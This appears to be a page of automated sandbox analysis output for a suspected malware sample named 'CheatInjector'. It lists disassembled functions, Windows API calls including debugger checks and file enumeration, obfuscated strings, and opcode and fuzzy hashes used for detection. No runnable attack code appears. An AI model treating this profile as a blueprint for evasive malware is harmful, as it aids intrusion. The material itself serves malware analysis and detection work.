                                                                • String ID: '$2$F$T$U$d$d$f$f$g$g$z
                                                                • API String ID: 0-4143742550
                                                                • Opcode ID: 98bd5fd111477dbece71d1bac09ccc4133425b6b6d2f97bd36a90ee6880d5cf6
                                                                • Instruction ID: 2eb8debbd204fad2e837d9289d4fb469d553c80105edf12fa13d49f90182f1ed
                                                                • Opcode Fuzzy Hash: 98bd5fd111477dbece71d1bac09ccc4133425b6b6d2f97bd36a90ee6880d5cf6
                                                                • Instruction Fuzzy Hash: 23A1F423A1C7E08AD711857C988435AEEC26FE7224F2DCB6DD5E5873C6D5B9C8028363
                                                                Function 004FBEA0 Relevance: 11.5, Strings: 9, Instructions: 280COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ rr$%pzw$*,"*$5939$@lf^$I<7n$JAMH$ODLq$h\[I
                                                                • API String ID: 0-2435971937
                                                                • Opcode ID: a6f9237c0ce12e81514c0614ab72aa656e57d5c24f8e698fa5c17d4b11ffe212
                                                                • Instruction ID: ada861f66b39b76c68cb7b132266c6d1ad34f1da2433bedf97aa29bf4e5e43f8
                                                                • Opcode Fuzzy Hash: a6f9237c0ce12e81514c0614ab72aa656e57d5c24f8e698fa5c17d4b11ffe212
                                                                • Instruction Fuzzy Hash: EE91BD7150C3998FD721CF29859036BBBE1AFD6344F04899DE5D49B342C739C90ACB96
                                                                Function 004DE2D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,M,00000002,00000000,?,?,?,004DE5EE,?,00000000), ref: 004DE369
                                                                • GetLocaleInfoW.KERNEL32(?,20001004,M,00000002,00000000,?,?,?,004DE5EE,?,00000000), ref: 004DE392
                                                                • GetACP.KERNEL32(?,?,004DE5EE,?,00000000), ref: 004DE3A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP$M
                                                                • API String ID: 2299586839-1541301406
                                                                • Opcode ID: 6afb832ce8feb59470c693b2f23869bc2775c94d3c2c830d9d34f87c3911b021
                                                                • Instruction ID: 448289d95968a6c82ed27f4f9671eb3e0764ac31f1d8ca528431abed16bfe43b
                                                                • Opcode Fuzzy Hash: 6afb832ce8feb59470c693b2f23869bc2775c94d3c2c830d9d34f87c3911b021
                                                                • Instruction Fuzzy Hash: 0321B322A00100EBDB34AF57C961AB773A6AB90B54B5A8467ED0ADF301E736DD41D358
                                                                Function 004EF430 Relevance: 10.2, Strings: 7, Instructions: 1454COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ $ $ $ $ $
                                                                • API String ID: 0-935225467
                                                                • Opcode ID: 7e3a9054b10ffa9b6b3e2b3cb611ff28d6c3ce50e1f1add8480a7a6e7f949604
                                                                • Instruction ID: 1ef1f9e69244284db619b9a3e1355fd9f3206c09e4bd1d8965a615cd4d933eb4
                                                                • Opcode Fuzzy Hash: 7e3a9054b10ffa9b6b3e2b3cb611ff28d6c3ce50e1f1add8480a7a6e7f949604
                                                                • Instruction Fuzzy Hash: DAA20431605385CFC718CF28C49027BBBE2ABD5354F18866FE5968B3A1D379D845CB8A
                                                                Function 004DF175 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: __floor_pentium4
                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                • API String ID: 4168288129-2761157908
                                                                • Opcode ID: 2aa5be96f68cc41e923ba6cad5a068158dcea7048eaf20def98b7132a271c32d
                                                                • Instruction ID: 2656dc79e7549a8f00c543c421796066940f2cc4a873edbb8dc3bba384ff4f2c
                                                                • Opcode Fuzzy Hash: 2aa5be96f68cc41e923ba6cad5a068158dcea7048eaf20def98b7132a271c32d
                                                                • Instruction Fuzzy Hash: E8D23771E082288BDB75CE29DD507EAB7B5EB44305F1441EBD80EA7340EB78AE858F45
                                                                Function 00531410 Relevance: 9.3, Strings: 7, Instructions: 536COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %}^$032S$<$InA>$`G$m;:=$tWwU
                                                                • API String ID: 0-363719249
                                                                • Opcode ID: fd0d40baf702e6549d0a2d719dffcd2ec7942f77ede965c4cf20b338cb19dff7
                                                                • Instruction ID: 7ec23511faf6671c37b7e6b9b41172a624f31d3df8ce1940c5e6cbf0a63d1f5d
                                                                • Opcode Fuzzy Hash: fd0d40baf702e6549d0a2d719dffcd2ec7942f77ede965c4cf20b338cb19dff7
                                                                • Instruction Fuzzy Hash: B702C1315087A58FD325CB28C49076FBBE2BBC5314F19CA2CE4A99B391DB7489059B86
                                                                Function 004DE4A5 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004DE5B1
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004DE5FA
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 004DE609
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004DE651
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004DE670
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                • String ID:
                                                                • API String ID: 415426439-0
                                                                • Opcode ID: 2f871ebbafbb0c5bd989147c6b8912ab720174d99c9611581f6ad7de622ccde8
                                                                • Instruction ID: bb0a2553b381525620b207a31c2bea55835cf3af076d8e22baa3e7edc3703824
                                                                • Opcode Fuzzy Hash: 2f871ebbafbb0c5bd989147c6b8912ab720174d99c9611581f6ad7de622ccde8
                                                                • Instruction Fuzzy Hash: 27518271900215ABDF10EFE6DC61ABB77B8AF44744F18446BE510DF391EB74D9008B69
                                                                Function 00529B40 Relevance: 6.5, Strings: 5, Instructions: 283COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @IVW$KJUT$Cb3$Cb3$Cb3
                                                                • API String ID: 0-2662954418
                                                                • Opcode ID: 6a0f07a3dc4bd773a4acdcb21061dd969fef1a863b429447b089265f081f3f9b
                                                                • Instruction ID: bafb11f5c032eb01028d8ce6242586092d8fca88dfdbbef748bd0916b86c4730
                                                                • Opcode Fuzzy Hash: 6a0f07a3dc4bd773a4acdcb21061dd969fef1a863b429447b089265f081f3f9b
                                                                • Instruction Fuzzy Hash: 46813836A083219FC711CE29D884A6ABBD2FFD6700F5AC92DE88597391D331ED05DB91
                                                                Function 004D8823 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: _strrchr
                                                                • String ID:
                                                                • API String ID: 3213747228-0
                                                                • Opcode ID: 377daaca5f40ff0bab8c76c66dec3116f3cd0f311fe1383518dd9434e06cd4a3
                                                                • Instruction ID: a0d095f316769c91c11af99713a5acb2dae7718ed8dcfc524e35f1fc6582d758
                                                                • Opcode Fuzzy Hash: 377daaca5f40ff0bab8c76c66dec3116f3cd0f311fe1383518dd9434e06cd4a3
                                                                • Instruction Fuzzy Hash: 9FB148B2A002459FDB158F68C8A1BFFBBA5EF55304F1481AFE845AB341CA389D01C769
                                                                Function 004DB239 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 004DB329
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004DB41D
                                                                • FindClose.KERNEL32(00000000), ref: 004DB45C
                                                                • FindClose.KERNEL32(00000000), ref: 004DB48F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID:
                                                                • API String ID: 1164774033-0
                                                                • Opcode ID: 6ef5a7c6bfecb3398019d1e069a90ed6231b8bb632d01e1c9c129092d3b8d4e0
                                                                • Instruction ID: dd1011ab0303723164e6f2af861e369fe4a1673afed3f36a0ceffea835cff69e
                                                                • Opcode Fuzzy Hash: 6ef5a7c6bfecb3398019d1e069a90ed6231b8bb632d01e1c9c129092d3b8d4e0
                                                                • Instruction Fuzzy Hash: B371F3759051689EDF20EF248CADAAEB7B8EF05304F1441DFE44897312DB384E809F98
                                                                Function 004C777F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 004C778B
                                                                • IsDebuggerPresent.KERNEL32 ref: 004C7857
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004C7870
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004C787A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: 2a8ced28ce38a5e740be173232303f1b9d2f7a2481c083f3b15652e9643cdffc
                                                                • Instruction ID: e1eadc786a76f4e2885b92ef47c0b37b1e3172407190ac51b06d632100e9dc49
                                                                • Opcode Fuzzy Hash: 2a8ced28ce38a5e740be173232303f1b9d2f7a2481c083f3b15652e9643cdffc
                                                                • Instruction Fuzzy Hash: 8D312B79D052189BDF60EF65D989BCDBBB8BF08304F1041AEE50CAB251EB749A84CF45
                                                                Function 0052D4C0 Relevance: 5.6, Strings: 4, Instructions: 583COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: InA>$InA>$KJUT$f
                                                                • API String ID: 0-1058621221
                                                                • Opcode ID: 79bcc3730dddd4440cd00294d95f88fdef28b7304a88d9779110d1765e43dca7
                                                                • Instruction ID: c11de02ca839f5e65e3714bb552dd7ee9978c6716a0ea8c3c8ebb7700cb5ca54
                                                                • Opcode Fuzzy Hash: 79bcc3730dddd4440cd00294d95f88fdef28b7304a88d9779110d1765e43dca7
                                                                • Instruction Fuzzy Hash: 92128B716083519FD714CF28D890B6BBBF1BFDA314F288A2CE49587291D774E845CBA2
                                                                Function 004FD3E0 Relevance: 5.4, Strings: 4, Instructions: 409COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Zpj^$\S$mn41$v|ib
                                                                • API String ID: 0-2171953124
                                                                • Opcode ID: 97557d5919cb3c71f1255b8acb75fd7174c80278fcc9d705a4620040c0808183
                                                                • Instruction ID: 831b7c7747bf187597cdb87b78d8edaed1f6317427e58446a48ad32f3ece75d2
                                                                • Opcode Fuzzy Hash: 97557d5919cb3c71f1255b8acb75fd7174c80278fcc9d705a4620040c0808183
                                                                • Instruction Fuzzy Hash: 5CC10471A0C3558BD320DF25C4902ABBBE3ABD2754F18892DE5E58B341D779C84ACB86
                                                                Function 004FF0B5 Relevance: 5.3, Strings: 4, Instructions: 283COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XY$^GFA$fch%$oi
                                                                • API String ID: 0-1781088019
                                                                • Opcode ID: 9ffec21fb698f4bf40debf497857e29d67619f03a931110843aa5faac01b07ce
                                                                • Instruction ID: d3195b6fab87252f0f3cf1025632344c9bce4856dc06b6e1b0adb8d2389b7b2e
                                                                • Opcode Fuzzy Hash: 9ffec21fb698f4bf40debf497857e29d67619f03a931110843aa5faac01b07ce
                                                                • Instruction Fuzzy Hash: 7A91CEB654D3D18BD370CF2584807EBBBE2ABD2304F19896DC8D95B345DB7A440A8B83
                                                                Function 0051DD30 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *&?$$7()&$:\Bs$Ncq
                                                                • API String ID: 0-3722810399
                                                                • Opcode ID: 89f41452a389bb23565023a9bdd1f4e03f42fb72e54e54bf06724564ce18ee86
                                                                • Instruction ID: 01aa6d56947cc9e4f663a496bd2feb36c7d8ad2b225453fbeb04d6fcff30fcb8
                                                                • Opcode Fuzzy Hash: 89f41452a389bb23565023a9bdd1f4e03f42fb72e54e54bf06724564ce18ee86
                                                                • Instruction Fuzzy Hash: 93719DB4509B908AE3368F3584907D3BFE1EB57344F04899CD1EB0B286D379644A8F66
                                                                Function 00516690 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MM$SK$S$[[
                                                                • API String ID: 0-3535307598
                                                                • Opcode ID: a0b91c98e78b6e5b1f9fa1322870f95ffcfe2805dc62a0394d0f90f70e8c8346
                                                                • Instruction ID: 2a917e48ea6acc45c1aeb0b3fb6789ffa397c81c5f20dfa6fc204770ea7c3422
                                                                • Opcode Fuzzy Hash: a0b91c98e78b6e5b1f9fa1322870f95ffcfe2805dc62a0394d0f90f70e8c8346
                                                                • Instruction Fuzzy Hash: FB5100769483159BE310DF64C88076FBAE5FFD6354F08892CE8846B391D7B89905CB92
                                                                Function 004FD9BD Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hik$YaBc$j]n_$qArC
                                                                • API String ID: 0-1646682085
                                                                • Opcode ID: 2ec30ee739d09b8543641fcd6afd8d709b5e4a332e5bdbf7e3cc4590ae00d15f
                                                                • Instruction ID: 525b3860b6b1cc213832f40b7e7c2674664d2ac8cff36e2d45b15f1f301d8836
                                                                • Opcode Fuzzy Hash: 2ec30ee739d09b8543641fcd6afd8d709b5e4a332e5bdbf7e3cc4590ae00d15f
                                                                • Instruction Fuzzy Hash: 5C51EAB8116B44DFE2648F229882BD3BBA1BB02344F508E1DC1EB2B704CB74A046CF55
                                                                Function 004DDF54 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004DDFA8
